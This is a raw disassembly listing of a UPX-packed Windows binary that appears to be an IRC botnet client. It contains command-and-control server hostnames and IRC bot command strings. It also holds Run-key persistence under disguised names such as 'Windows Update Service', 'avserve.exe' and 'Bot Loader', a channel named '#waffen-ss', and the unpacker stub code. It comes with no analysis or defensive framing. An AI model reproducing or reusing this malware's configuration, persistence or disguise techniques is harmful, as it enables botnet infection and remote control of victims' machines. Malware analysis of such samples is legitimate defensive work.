dd offset aGaspode_zanet_ ; "gaspode.zanet.org.za"
dd offset dword_31205BF4
dword_31205BF4 dd 2E637269h, 2E72616Bh, 74656EhaGaspode_zanet_ db 'gaspode.zanet.org.za',0 ; DATA XREF: UPX0:31205BEC�o
align 4
aLia_zanet_net db 'lia.zanet.net',0 ; DATA XREF: UPX0:31205BE8�o
align 4
aIrc_tsk_ru db 'irc.tsk.ru',0 ; DATA XREF: UPX0:31205BE4�o
align 4
aLondon_uk_eu_u db 'london.uk.eu.undernet.org',0 ; DATA XREF: UPX0:31205BE0�o
align 10h
aWashington_dc_ db 'washington.dc.us.undernet.org',0 ; DATA XREF: UPX0:31205BDC�o
align 10h
aLosAngeles_ca_ db 'los-angeles.ca.us.undernet.org',0 ; DATA XREF: UPX0:31205BD8�o
align 10h
aBrussels_be_eu db 'brussels.be.eu.undernet.org',0 ; DATA XREF: UPX0:31205BD4�o
aCaen_fr_eu_und db 'caen.fr.eu.undernet.org',0 ; DATA XREF: UPX0:31205BD0�o
aFlanders_be_eu db 'flanders.be.eu.undernet.org',0 ; DATA XREF: UPX0:31205BCC�o
aGraz_at_eu_und db 'graz.at.eu.undernet.org',0 ; DATA XREF: UPX0:31205BC8�o
aGazProm_ru db 'gaz-prom.ru',0 ; DATA XREF: UPX0:31205BC4�o
aMoscowAdvokat_ db 'moscow-advokat.ru',0 ; DATA XREF: UPX0:off_31205BC0�o
align 4
aAbcdefghijkl_0 db 'abcdefghijklmnopqrstuvwxyz',0 ; DATA XREF: sub_31201D4B+1C�o
align 4
aAbcdefghijklmn db 'ABCDEFGHIJKLMNOPQRSTUVWXYZ',0 ; DATA XREF: sub_31201D4B+C�o
align 10h
aUserS8S db 'USER %s 8 * :%s',0Dh,0Ah,0 ; DATA XREF: sub_31201E80+1C4�o
align 4
aAlready db 'already',0 ; DATA XREF: sub_31201E80+133�o
aNickS db 'NICK %s',0Dh,0Ah,0 ; DATA XREF: sub_31201E80+D9�o
; sub_31201E80+165�o
align 4
aPassS db 'PASS %s',0Dh,0Ah,0 ; DATA XREF: sub_31201E80+9C�o
align 4
aPongS db 'PONG%s',0Dh,0Ah,0 ; DATA XREF: sub_312020C2+4F�o
align 10h
aPing db 'PING',0 ; DATA XREF: sub_312020C2+C�o
; sub_31202145:loc_312021E7�o
align 4
a451 db '451',0 ; DATA XREF: sub_31202145+8E�o
aJoinS db 'JOIN %s',0Dh,0Ah,0 ; DATA XREF: sub_31202145+16�o
align 4
aQuitS db 'QUIT %s',0Dh,0Ah,0 ; DATA XREF: sub_31202217+2C�o
align 4
aPrivmsgSS db 'PRIVMSG %s %s',0Dh,0Ah,0 ; DATA XREF: sub_3120238E+3B�o
aWaffenSs db '#waffen-ss',0 ; DATA XREF: UPX0:312025CE�o
align 10h
a10 db '10',0 ; DATA XREF: UPX0:312024BB�o
align 4
a_: ; DATA XREF: UPX0:312024B0�o
unicode 0, <_>,0
a_exe db '.exe',0 ; DATA XREF: sub_3120266C+75�o
; sub_312035F2+4B�o
align 10h
asc_31205DE0: ; DATA XREF: sub_3120266C+49�o
; sub_312035F2+56�o
unicode 0, <\>,0
aMozilla4_0Comp db 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',0
; DATA XREF: sub_3120266C+13�o
align 4
aJoin db 'JOIN',0 ; DATA XREF: sub_31202786+2E9�o
align 10h
aQ: ; DATA XREF: sub_31202786+2C4�o
unicode 0, <q>,0
aDD10SD db '%d,%d,10%s,%d',0 ; DATA XREF: sub_31202786+29E�o
align 4
aI: ; DATA XREF: sub_31202786+254�o
unicode 0, <i>,0
asc_31205E38: ; DATA XREF: sub_31202786+23B�o
unicode 0, <|>,0
aE: ; DATA XREF: sub_31202786+148�o
unicode 0, <e>,0
a1D db '-1,%d',0 ; DATA XREF: sub_31202786+79�o
align 4
aFtpupd_exe db 'ftpupd.exe',0 ; DATA XREF: UPX0:31202DF0�o
align 4
aUser32 db 'user32',0 ; DATA XREF: sub_31202E66+B0�o
align 4
aMsvcrt db 'msvcrt',0 ; DATA XREF: sub_31202E66+A2�o
align 4
aWininet db 'wininet',0 ; DATA XREF: sub_31202E66+9B�o
aWs2_32 db 'ws2_32',0 ; DATA XREF: sub_31202E66+8E�o
align 4
aU10 db 'u10',0 ; DATA XREF: sub_31202E66+7C�o
aU9 db 'u9',0 ; DATA XREF: sub_31202E66+70�o
align 4
aU8 db 'u8',0 ; DATA XREF: sub_31202E66+64�o
align 10h
aU6 db 'u6',0 ; DATA XREF: sub_31202E66+5A�o
align 4
aU9x db 'u9x',0 ; DATA XREF: sub_31202E66+3E�o
aU10x db 'u10x',0 ; DATA XREF: sub_31202E66+23�o
align 10h
asc_31205E90 db 0Dh,0Ah,0 ; DATA XREF: sub_31202FDD+124�o
align 4
aUseridUnix db ' : USERID : UNIX : ',0 ; DATA XREF: sub_31202FDD+104�o
aSoftwareMicros db 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run',0
; DATA XREF: sub_31202C78+23�o
; sub_31203552+51�o ...
align 4
aDiskDefragment db 'Disk Defragmenter',0 ; DATA XREF: sub_31202C78+1C�o
; sub_312035F2+87�o ...
align 4
aSoftwareMicr_0 db 'Software\Microsoft\Wireless',0 ; DATA XREF: sub_312036BE+5A�o
; sub_312036BE+94�o
aClient db 'Client',0 ; DATA XREF: sub_312036BE+55�o
; sub_312036BE+8E�o
align 10h
aAvserve2_exeup db 'avserve2.exeUpdate Service',0 ; DATA XREF: sub_31203552+40�o
align 4
aAvserve_exe db 'avserve.exe',0 ; DATA XREF: sub_31203552+39�o
aWindowsUpdateS db 'Windows Update Service',0 ; DATA XREF: sub_31203552+32�o
align 10h
aWinupdate db 'WinUpdate',0 ; DATA XREF: sub_31203552+2B�o
align 4
aSystray db 'SysTray',0 ; DATA XREF: sub_31203552+24�o
aBotLoader db 'Bot Loader',0 ; DATA XREF: sub_31203552+1D�o
align 10h
aSystemRestoreS db 'System Restore Service',0 ; DATA XREF: sub_31203552+16�o
align 4
aWindowsSecurit db 'Windows Security Manager',0 ; DATA XREF: sub_31203552+F�o
align 4
a1: ; DATA XREF: sub_312036BE+50�o
unicode 0, <1>,0
dd 8 dup(0)
dword_31205FC8 dd 0 ; UPX0:312025B7�w ...
dword_31205FCC dd 0 ; sub_31202786+E9�r ...
dword_31205FD0 dd 8 dup(0) ; sub_31202786+A�o
dword_31205FF0 dd 0 dword_31205FF4 dd 0 ; sub_31202C78+80�w
dword_31205FF8 dd 0 ; sub_31202C2A+25�o ...
dword_31205FFC dd 0 ; sub_31202C78+75�w ...
UPX0 ends
; Section 2. (virtual address 00006000)
; Virtual size : 00003000 ( 12288.)
; Section size in file : 00003000 ( 12288.)
; Offset to raw data for section: 00006000
; Flags E0000040: Data Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
UPX1 segment para public 'CODE' use32
assume cs:UPX1
;org 31206000h
assume es:nothing, ss:nothing, ds:UPX0, fs:nothing, gs:nothing
dword_31206000 dd 68h ; UPX0:31202E10�w ...
dword_31206004 dd 0 ; sub_31202E66+34�w
dword_31206008 dd 8 dup(0) dword_31206028 dd 0 ; sub_312032DA+55�r
dword_3120602C dd 31200000h ; UPX0:31202DF5�w
dword_31206030 dd 0 ; sub_31203196+36�o ...
dword_31206034 dd 0 ; sub_312032DA+37�w ...
dword_31206038 dd 0 ; sub_312036BE+3C�w ...
dd 3F1h dup(0)
dd 0C4h, 40h, 72695601h, 6C617574h, 65657246h, 69560100h
dd 61757472h, 6C6C416Ch, 100636Fh, 4D746547h, 6C75646Fh
dd 6C694665h, 6D614E65h, 1004165h, 7274736Ch, 69706D63h
dd 43010041h, 4679706Fh, 41656C69h, 69570100h, 6578456Eh
dd 43010063h, 74616572h, 6F6F5465h, 6C65686Ch, 53323370h
dd 7370616Eh, 746F68h, 6F725001h, 73736563h, 69463233h
dd 747372h, 72655401h, 616E696Dh, 72506574h, 7365636Fh
dd 50010073h, 65636F72h, 32337373h, 7478654Eh, 704F0100h
dd 76456E65h, 41746E65h, 65440100h, 6574656Ch, 656C6946h
dd 45010041h, 50746978h, 65636F72h, 1007373h, 46746547h
dd 53656C69h, 657A69h, 61655201h, 6C694664h, 49010065h
dd 7265746Eh, 6B636F6Ch, 6E496465h, 6D657263h, 746E65h
dd 65724301h, 50657461h, 65636F72h, 417373h, 65724301h
dd 4D657461h, 78657475h, 6C010041h, 63727473h, 41706Dh
dd 74654701h, 61636F4Ch, 6E49656Ch, 416F66h, 74736C01h
dd 74616372h, 6C010041h, 63727473h, 417970h, 74654701h
dd 7473614Ch, 6F727245h, 53010072h, 65747379h, 6D69546Dh
dd 466F5465h, 54656C69h, 656D69h, 74654701h, 74737953h
dd 69546D65h, 100656Dh, 736F6C43h, 6E614865h, 656C64h
dd 69725701h, 69466574h, 100656Ch, 61657243h, 69466574h
dd 41656Ch, 74736C01h, 79706372h, 100416Eh, 43746553h
dd 65727275h, 6944746Eh, 74636572h, 4179726Fh, 65470100h
dd 73795374h, 446D6574h, 63657269h, 79726F74h, 45010041h
dd 54746978h, 61657268h, 53010064h, 76457465h, 746E65h
dd 69615701h, 726F4674h, 676E6953h, 624F656Ch, 7463656Ah
dd 72430100h, 65746165h, 65726854h, 1006461h, 61657243h
dd 76456574h, 41746E65h, 736C0100h, 656C7274h, 100416Eh
dd 65656C53h, 47010070h, 75437465h, 6E657272h, 6F725074h
dd 73736563h, 65470100h, 6F725074h, 64644163h, 73736572h
dd 6F4C0100h, 694C6461h, 72617262h, 1004179h, 74697257h
dd 6F725065h, 73736563h, 6F6D654Dh, 1007972h, 6E65704Fh
dd 636F7250h, 737365h, 74654701h, 75646F4Dh, 6148656Ch
dd 656C646Eh, 47010041h, 69547465h, 6F436B63h, 746E75h
dd 0D100h, 0
dd 65520100h, 65724367h, 4B657461h, 78457965h, 52010041h
dd 65536765h, 6C615674h, 78456575h, 52010041h, 75516765h
dd 56797265h, 65756C61h, 417845h, 67655201h, 6E65704Fh
dd 4579654Bh, 1004178h, 44676552h, 74656C65h, 6C615665h
dd 416575h, 67655201h, 736F6C43h, 79654B65h, 62410100h
dd 5374726Fh, 65747379h, 7568536Dh, 776F6474h, 100416Eh
dd 70797243h, 65724374h, 48657461h, 687361h, 79724301h
dd 61487470h, 61446873h, 1006174h, 70797243h, 72655674h
dd 53796669h, 616E6769h, 65727574h, 43010041h, 74707972h
dd 74736544h, 48796F72h, 687361h, 79724301h, 65447470h
dd 6F727473h, 79654B79h, 72430100h, 52747079h, 61656C65h
dd 6F436573h, 7865746Eh, 43010074h, 74707972h, 75716341h
dd 43657269h, 65746E6Fh, 417478h, 79724301h, 6D497470h
dd 74726F70h, 79654Bh, 0DE00h, 0F800h, 74730100h, 79706372h
dd 74730100h, 74616372h, 655F0100h, 70656378h, 61685F74h
dd 656C646Eh, 1003372h, 696F7461h, 72730100h, 646E61h
dd 48455F01h, 6F72705Fh, 676F6Ch, 435F5F01h, 72467878h
dd 48656D61h, 6C646E61h, 1007265h, 73727473h, 1007274h
dd 63727473h, 1007268h, 6C727473h, 1006E65h, 736D656Dh
dd 1007465h, 636D656Dh, 1007970h, 646E6172h, 0E90000h
dd 1300000h, 77010000h, 69727073h, 4166746Eh, 65470100h
dd 726F4674h, 6F726765h, 57646E75h, 6F646E69h, 46010077h
dd 57646E69h, 6F646E69h, 1004177h, 57746547h, 6F646E69h
dd 72685477h, 50646165h, 65636F72h, 64497373h, 0F40000h
dd 1440000h, 49010000h, 7265746Eh, 4F74656Eh, 416E6570h
dd 6E490100h, 6E726574h, 65477465h, 6E6F4374h, 7463656Eh
dd 74536465h, 657461h, 746E4901h, 656E7265h, 65704F74h
dd 6C72556Eh, 49010041h, 7265746Eh, 5274656Eh, 46646165h
dd 656C69h, 10000h, 15800h, 8FF00h, 0FF0073FFh, 6FFF0039h
dd 0BFF00h, 0FF0034FFh, 0CFF0012h, 4FF00h, 0FF0016FFh
dd 9FF0017h, 2FF00h, 0FF000DFFh, 3FF0001h, 10FF00h, 13FFh
dd 0
dd 4550h, 2014Ch, 40BC2CE6h, 2 dup(0)
dd 10F00E0h, 6010Bh, 3200h, 1200h, 0
dd 2DE8h, 1000h, 5000h, 31200000h, 1000h, 200h, 4, 0
dd 4, 0
dd 7000h, 400h, 0
dd 2, 100000h, 1000h, 100000h, 1000h, 0
dd 10h, 2 dup(0)
dd 38E0h, 8Ch, 14h dup(0)
dd 1000h, 1A4h, 6 dup(0)
dd 7865742Eh, 74h, 3088h, 1000h, 3200h, 400h, 3 dup(0)
dd 0E0040020h, 7461642Eh, 61h, 103Ch, 5000h, 1000h, 3600h
dd 3 dup(0)
dd 0C0000040h, 6000h, 3B10h, 651Ch, 966AD000h, 439FB178h
dd 0FFFFEB51h, 0A827FFFFh, 8A397086h, 0C214DE09h, 7A53C1A1h
dd 85C4BF16h, 0E70F611Ah, 209E9829h, 0FE538966h, 0FFFF0CB1h
dd 9407FFFFh, 75A3ECCAh, 0F91DA11Eh, 0CBC5B4E8h, 0F0DB1A4Eh
dd 873969D7h, 7B948C1Ah, 821318C6h, 0FFFF3EB3h, 4BBFFFFFh
dd 0EB67E042h, 0B7378400h, 0D8B3AA60h, 48022D7h, 4BA67A65h
dd 855886FFh, 0F96EF645h, 20B756EEh, 2FC9FFFFh, 3B4A3200h
dd 0D87AB7A6h, 6F63EBD3h, 1278746Eh, 0FFF6DB36h, 0AAAAD5FFh
dd 0C9335DABh, 226B966h, 8B05758Dh, 3C068AFEh, 6460799h
dd 0FA2DFF2Ch, 344630FFh, 47078899h, 0AEBEDE2h, 2E71DAE8h
dd 2E676562h, 0FF999371h, 0C9BFF6FFh, 0BDFD1201h, 716FD91h
dd 0AA6872C1h, 0AA66FD42h, 14BA10FDh, 1F98F11Ch, 1A7F7DBBh
dd 898F3C9h, 8710286h, 0CB5F9010h, 1DB7DA37h, 965992FBh
dd 180DBB1Ch, 89B0375h, 0FEC125CDh, 2510F6C8h, 47ECE4D5h
dd 1B5D1854h, 0DBEC7FB1h, 0F3449FF3h, 19AE719Bh, 65E368F3h
dd 0B1C1C10h, 0FEEFED6Fh, 0FFD9751Ah, 24BD9D5Eh, 4DDC12FFh
dd 0ADD10FFh, 33AC4F07h, 73BEDFFBh, 0B29D0B00h, 98E51459h
dd 45123232h, 66CA89F3h, 0F7D9332Ch, 6E713D9Fh, 416713B3h
dd 0D95D1A74h, 0AE11348Ah, 0F3F6DF7Bh, 8904F19Dh, 2D04F109h
dd 0D9B22EF3h, 676493F6h, 76F0E3F3h, 6D2182E4h, 0C9EC993Fh
dd 0E86F2156h, 9B2097C0h, 9327EDBAh, 0C1D83F16h, 0C98ED5E5h
dd 1ECFC919h, 13BF7FBh, 0E90414D9h, 2871CA23h, 0FB688D63h
dd 61CB230Bh, 0F4C3F591h, 0CDA7ED66h, 9C6C5D12h, 0C9B6B36Ch
dd 56794ECBh, 327F10F5h, 485A9FD9h, 14C096A6h, 0A7294CE0h
dd 0FDF2F3EBh, 5D9CB2E4h, 26F434FEh, 0FFC5D071h, 0F97FD9BFh
dd 0ECEF133Bh, 10CA9A8h, 0EDFFC5B7h, 0FDE9ECE9h, 0FC2FFCB7h
dd 0FCE1F211h, 0F5CAC999h, 0CFE9FCFCh, 0FFEBFCF2h, 0F7F97FFFh
dd 0ABAAF5FCh, 0AAF934C7h, 2A2DB459h, 0ACC91E66h, 0A5B7E7E6h
dd 0B8BD9CC9h, 0E37D829Dh, 92712ECFh, 3519BF30h, 951F1451h
dd 0FF91720Ah, 2AD8C1FFh, 0D231C871h, 80D512A5h, 0AA529AE1h
dd 2A8D146Fh, 85B9C89Ah, 12F6FFB7h, 474A9A8Bh, 0AB9E5958h
dd 0A319DB9Bh, 0A26CEC20h, 0FB7FFFC1h, 9EED85FFh, 81E8A2DFh
dd 125544EBh, 961FBDC8h, 12EB8D2Eh, 5A9A85D8h, 9A099D12h
dd 1613FE5Ah, 2EF8109Ah, 66491818h, 12FEFD7Fh, 0DEDDB687h
dd 0C212CFEEh, 12850295h, 5A910482h, 54CFF7CBh, 0DE8CFF7Fh
dd 4D53FF85h, 18097242h, 0FFFFC853h, 0FE4185EFh, 621700h
dd 20435002h, 5754454Eh, 204B524Fh, 0DAC75250h, 474FFF97h
dd 204D4152h, 4C302E31h, 24D4E41h, 0ED69570Ah, 6EFA5F6Fh
dd 73776F64h, 20726F8Ch, 676B0357h, 70756F72h, 5BF61D0Eh
dd 312E33F7h, 234D2761h, 30305832h, 0B3323232h, 16ADFE56h
dd 20544E0Ah, 30204D4Ch, 4AD58B16h, 73A49E46h, 0DF60D807h
dd 0FF0CBE6Eh, 11040023h, 520140Ah, 0D56ED6FAh, 695BD4h
dd 53534B4Ch, 47B70050h, 9712AEF2h, 57E00882h, 6E2400h
dd 0FEE6D8BDh, 6F0064h, 3A730077h, 9013074h, 0BD912DB9h
dd 3500398Ch, 72E1D23h, 80D9139Eh, 8ABDA00h, 9927DA20h
dd 9F574064h, 0D830003h, 466E0276h, 40074723h, 203C8DCFh
dd 10060006h, 0FFFD1F01h, 8A15FF97h, 48E088h, 8144004Fh
dd 0F27A6A19h, 281C49E4h, 742530AFh, 85536710h, 0E181137Ch
dd 0CE75DF5Ch, 303CB075h, 2F5C0400h, 36085A01h, 5CBDD772h
dd 72E4D61h, 2E380036h, 6D839B77h, 491B3037h, 6443EC00h
dd 79003F00h, 64633B0Eh, 6DFF20A2h, 4DC08F9h, 0FF1640h
dd 0E00DEDEh, 13091600h, 19FF612h, 28402602h, 0BF7DC346h
dd 8B110319h, 0D374D96Ch, 0F65DF214h, 2A630070h, 0E256B9Ch
dd 9FB6D9ECh, 4480E10h, 0B6E7541Bh, 5413EBAEh, 5963265Ah
dd 0CBC75C22h, 0DCFF9A41h, 5876545h, 10030B00h, 0E93F48h
dd 110B8DAh, 286A01C1h, 3FF03919h, 0B10CFFF6h, 0A89B11D0h
dd 0D94FC000h, 5D5FF52Eh, 1CEB8A88h, 0E89F11C9h, 0BECBD917h
dd 48102B3Ch, 0F40CD160h, 0F21E60A3h, 0CA03E4Ah, 0CB10CA0h
dd 40191C9Dh, 880CA000h, 0FF7C93C2h, 90040h, 703ECh, 4F401495h
dd 3D836452h, 0BF40707Ch, 7FE10700h, 1343F644h, 138578h
dd 0E9A65BABh, 0F204E713h, 2FF8103Ch, 2418FEFFh, 230E8C60h
dd 0E908F240h, 8460E93Eh, 10B94388h, 9B01FFEEh, 0B8F2793Ch
dd 0AD200C10h, 0AF2070Dh, 0F7F30F9h, 870118D8h, 70CF92BCh
dd 0F840F84h, 37E4F95h, 2000FC8h, 6C0F847Fh, 0C3C2550Fh
dd 0A89A0026h, 6446046Fh, 2313436Fh, 27F95840h, 50586E69h
dd 725020h, 0DB6790A1h, 3B014A46h, 90896B32h, 123CF927h
dd 41027515h, 53950053h, 9E1CAF64h, 0FF06EB01h, 0CCFFF37Fh
dd 73255C5Ch, 6370695Ch, 0EC816624h, 0E4FF071Ch, 44655300h
dd 67756265h, 2FF3FFF6h, 6C697669h, 41656765h, 73756A64h
dd 6B6F5474h, 4F176E65h, 734CDB72h, 75126F4Ch, 6C615670h
dd 0EEDFB6C5h, 17416575h, 6F28704Fh, 34732463h, 0FFC18FFFh
dd 76646143h, 33697061h, 657475EFh, 30316D72h, 65685300h
dd 0FFCDEDF6h, 545F6C6Ch, 57796172h, 7243646Eh, 521A6165h
dd 56F6D65h, 0EE77DB6Bh, 140C6854h, 74726956h, 28415875h
dd 0B76B384Fh, 0F784576h, 356E724Eh, 0CD340447h, 0F8768176h
dd 0C4E0035Ch, 4D34D3ACh, 507090D3h, 56FE2834h, 184D36h
dd 634E5BF4h, 72616B2Eh, 6FFEE82Eh, 67E644D4h, 6F707361h
dd 7A2E6564h, 6F2E0D61h, 0B996E7F6h, 6C570967h, 25136169h
dd 73FE19A2h, 7374330Fh, 75722E6Bh, 0DDAD7B86h, 2E6EEC6Eh
dd 75650D75h, 3B8E0B05h, 175B0BBAh, 684F7727h, 1F7467CEh
dd 0AC8FE564h, 1F3231D0h, 2D736F6Ch, 0BB2BB461h, 1A65BE6Dh
dd 62206163h, 6A665260h, 731D312Bh, 53DE5D49h, 652FDB76h
dd 17726655h, 0E616C66h, 0C0985C2Bh, 7A596733h, 0FB17512Eh
dd 162B6E16h, 6D9F702Dh, 0AE936DD0h, 0F254B860h, 0A99E2D77h
dd 5DBB7F2Ah, 62ABE278h, 67662D63h, 6C6B6ACBh, 5F6F6E6Dh
dd 70DA17E2h, 76835E71h, 7A797877h, 434241C9h, 5AB7D444h
dd 474645FEh, 4B4A4948h, 5251F84Eh, 0A2B75453h, 0A6BA0A85h
dd 4553925Ah, 0C6FEDDF0h, 20522052h, 202A2038h, 0A0D073Ah
dd 85606C4Bh, 79C7F12Eh, 414349F8h, 0D93D9B13h, 53EE50C6h
dd 474E4F0Bh, 176B0B0Ah, 749A57Eh, 4AAE3534h, 5B2F0C4Fh
dd 510FC93Ch, 52544955h, 47415649h, 7B185C2Eh, 74231166h
dd 2D1A6666h, 2699B173h, 0C431903Ah, 2E78F05Fh, 0B78AFE34h
dd 7A6F4D85h, 342F239Ch, 85DBB70Bh, 0E92820A9h, 69E4706Dh
dd 0D3B8062h, 20B7D0B9h, 20454944h, 203BBF36h, 0D42EC5Dh
dd 29913594h, 3A7B00h, 0BBB9AD70h, 64250371h, 6C59022Ch
dd 4CFD9F07h, 7C030BF7h, 13312D60h, 47707466h, 64B78E9h
dd 73DB7564h, 0D1CD8F9Dh, 76736DF8h, 5C13B963h, 5B964569h
dd 325F6EFBh, 4A75175Fh, 38003903h, 69B7DEF0h, 13783936h
dd 0DCE06F78h, 38B0FBC2h, 44494620h, 6583408h, 9746FED0h
dd 81464F27h, 5C455241h, 6E53694Dh, 0AFB6D83Fh, 0B35C6F6Fh
dd 7275435Ch, 5674FD72h, 3A37A7C6h, 5C766901h, 446C7552h
dd 0EE68AC69h, 0C620D28Dh, 6D67612Dh, 15AC1B1Ch, 35248B9Ch
dd 6B432B2Ah, 72263C2Ch, 0F043388Ah, 5DDF6A26h, 0BC76AB83h
dd 0C9326576h, 0B258D055h, 208B6DCDh, 65301053h, 46E6E41Bh
dd 23308436h, 0E96B1217h, 796F6FD3h, 4200D873h, 4A2720CBh
dd 616398B7h, 6D1B137Dh, 2DEEE020h, 8606D1ACh, 0D6104F37h
dd 63B7851Ah, 797469CEh, 0B6BAD39Bh, 31060011h, 2715C400h
dd 3FC440D4h, 0B2457B01h, 7246649Fh, 710C6565h, 0F15BC50Dh
dd 7465477Fh, 75646F4Dh, 0E346656Ch, 0F76D614Eh, 0E06FFDDEh
dd 74736C01h, 706D6372h, 6F430A69h, 0A197970h, 2DEE158h
dd 657845C5h, 0FFEDC632h, 6F54F8ADh, 70DF6C6Fh, 6E533233h
dd 68737061h, 0BA19746Fh, 14409B5Bh, 73723212h, 0E60B540Fh
dd 3507815Ah, 0D821182Ch, 4E01EE40h, 49207865h, 42B57645h
dd 5F9C8574h, 0E729AC44h, 6C82DD92h, 34746969h, 2BDB16A3h
dd 6953F745h, 6E52BE7Ah, 0B449090Dh, 0FA10CEEDh, 64656BC4h
dd 0D894630Ah, 0B473364h, 0F41709Dh, 740B65D8h, 0DA78934Dh
dd 0B0DA5441h, 3B4CDBCBh, 66656C61h, 0FC29196Fh, 23C3C836h
dd 0D617970h, 6F727245h, 11EE7B72h, 6954DEA2h, 981FB6Dh
dd 0D8B2DC81h, 46E1823h, 715AFECDh, 0A1B34865h, 0D1697257h
dd 86F65DD6h, 6E610B86h, 623E530Ah, 0E388CE23h, 663AE44h
dd 3835EC96h, 8145478h, 131D066Fh, 15373636h, 63BA5B68h
dd 53204661h, 0CC361B98h, 624F5BBDh, 2C6D2E6Ah, 0B0DAC50Dh
dd 29DE2F37h, 1661097Bh, 706506BBh, 0DF71826Ch, 0B7FB111h
dd 72646441h, 694CE10Fh, 0AE617262h, 887B360Dh, 0A34D2BD6h
dd 0B031989Dh, 543EC909h, 4D9850A3h, 0A91FD008h, 9A89304Eh
dd 0D1887562h, 9F9DCEA8h, 9F67CCD0h, 4579654Bh, 3B5ADA10h
dd 0F6944ECh, 46600A51h, 11C25EC0h, 7B38306Bh, 216C5987h
dd 0C518310h, 76841C68h, 499C6241h, 36026853h, 85A57B7Bh
dd 707972F7h, 0DBA07774h, 0B98D60BEh, 12440A10h, 0C2C70E61h
dd 6972315Dh, 67567966h, 0C3686DBFh, 362B755Ah, 796F3E6Ch
dd 0EC2DECEEh, 106F112Ch, 1ECF8F52h, 651E6DADh, 14E4EAEBh
dd 0E356341h, 7571F21Bh, 494D7269h, 0B34E38Ah, 133AA0CEh
dd 151BF8DEh, 736775Ah, 2F5F3E61h, 740AD655h, 685F2AB8h
dd 15117C4Bh, 0EEB9DD06h, 721F696Fh, 48451E10h, 4A9AEC5Fh
dd 67F2B6EFh, 78435F0Bh, 48C5E578h, 0CD8B99D9h, 4D02452Ch
dd 0DB620768h, 6E17B656h, 74A26D22h, 0ED9B3607h, 844C6DC5h
dd 770130E9h, 6131D073h, 0AA6953DBh, 655FBA66h, 1334562Dh
dd 14CA22F5h, 1AC366CCh, 0B210BC8h, 66306E9Ah, 4F490670h
dd 983D44F4h, 9FAB74E8h, 0D1C941BAh, 390E96E0h, 0C3B36E11h
dd 70CC2ED6h, 298F7453h, 0D92CAB55h, 0F902925Ch, 0B258034Fh
dd 0FFB6CB2Ch, 39730208h, 0B2CB0B6Fh, 1234CB2Ch, 1716040Ch
dd 2CB2CB2Ch, 10D0209h, 0C67A8503h, 7A1310B2h, 7FDF4550h
dd 73006F90h, 40BC2CE6h, 10F00E0h, 3D57010Bh, 0C06B66Bh
dd 0E8131232h, 0F635AA2Dh, 96303C05h, 25020B31h, 27592CDDh
dd 0B2700C07h, 1EB99D81h, 6071034h, 59A25AABh, 0BF8C1F6Bh
dd 805DB0Ah, 1E01A464h, 0E3C01D60h, 302B7E2Eh, 642E6F90h
dd 0E5F432D5h, 642EE010h, 4ED90DF6h, 73CFB0Ah, 34B02736h
dd 1A40176Fh, 3B6000C0h, 1Ch, 900096C0h, 0FF0000h, 2 dup(0)
; ---------------------------------------------------------------------------
public start
start:
pusha
mov esi, offset dword_31206000
lea edi, [esi-5000h]
push edi
or ebp, 0FFFFFFFFh
jmp short loc_31208222
; ---------------------------------------------------------------------------
align 8
loc_31208218: ; CODE XREF: UPX1:loc_31208229�j
mov al, [esi]
inc esi
mov [edi], al
inc edi
loc_3120821E: ; CODE XREF: UPX1:312082B6�j
; UPX1:312082CD�j
add ebx, ebx
jnz short loc_31208229
loc_31208222: ; CODE XREF: UPX1:31208210�j
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_31208229: ; CODE XREF: UPX1:31208220�j
jb short loc_31208218
mov eax, 1
loc_31208230: ; CODE XREF: UPX1:3120823F�j
; UPX1:3120824A�j
add ebx, ebx
jnz short loc_3120823B
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_3120823B: ; CODE XREF: UPX1:31208232�j
adc eax, eax
add ebx, ebx
jnb short loc_31208230
jnz short loc_3120824C
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
jnb short loc_31208230
loc_3120824C: ; CODE XREF: UPX1:31208241�j
xor ecx, ecx
sub eax, 3
jb short loc_31208260
shl eax, 8
mov al, [esi]
inc esi
xor eax, 0FFFFFFFFh
jz short loc_312082D2
mov ebp, eax
loc_31208260: ; CODE XREF: UPX1:31208251�j
add ebx, ebx
jnz short loc_3120826B
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_3120826B: ; CODE XREF: UPX1:31208262�j
adc ecx, ecx
add ebx, ebx
jnz short loc_31208278
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_31208278: ; CODE XREF: UPX1:3120826F�j
adc ecx, ecx
jnz short loc_3120829C
inc ecx
loc_3120827D: ; CODE XREF: UPX1:3120828C�j
; UPX1:31208297�j
add ebx, ebx
jnz short loc_31208288
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_31208288: ; CODE XREF: UPX1:3120827F�j
adc ecx, ecx
add ebx, ebx
jnb short loc_3120827D
jnz short loc_31208299
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
jnb short loc_3120827D
loc_31208299: ; CODE XREF: UPX1:3120828E�j
add ecx, 2
loc_3120829C: ; CODE XREF: UPX1:3120827A�j
cmp ebp, 0FFFFF300h
adc ecx, 1
lea edx, [edi+ebp]
cmp ebp, 0FFFFFFFCh
jbe short loc_312082BC
loc_312082AD: ; CODE XREF: UPX1:312082B4�j
mov al, [edx]
inc edx
mov [edi], al
inc edi
dec ecx
jnz short loc_312082AD
jmp loc_3120821E
; ---------------------------------------------------------------------------
align 4
loc_312082BC: ; CODE XREF: UPX1:312082AB�j
; UPX1:312082C9�j
mov eax, [edx]
add edx, 4
mov [edi], eax
add edi, 4
sub ecx, 4
ja short loc_312082BC
add edi, ecx
jmp loc_3120821E
; ---------------------------------------------------------------------------
loc_312082D2: ; CODE XREF: UPX1:3120825C�j
pop esi
mov edi, esi
mov ecx, 0B5h
loc_312082DA: ; CODE XREF: UPX1:312082E1�j
; UPX1:312082E6�j
mov al, [edi]
inc edi
sub al, 0E8h
loc_312082DF: ; CODE XREF: UPX1:31208304�j
cmp al, 1
ja short loc_312082DA
cmp byte ptr [edi], 1
jnz short loc_312082DA
mov eax, [edi]
mov bl, [edi+4]
shr ax, 8
rol eax, 10h
xchg al, ah
sub eax, edi
sub bl, 0E8h
add eax, esi
mov [edi], eax
add edi, 5
mov eax, ebx
loop loc_312082DF
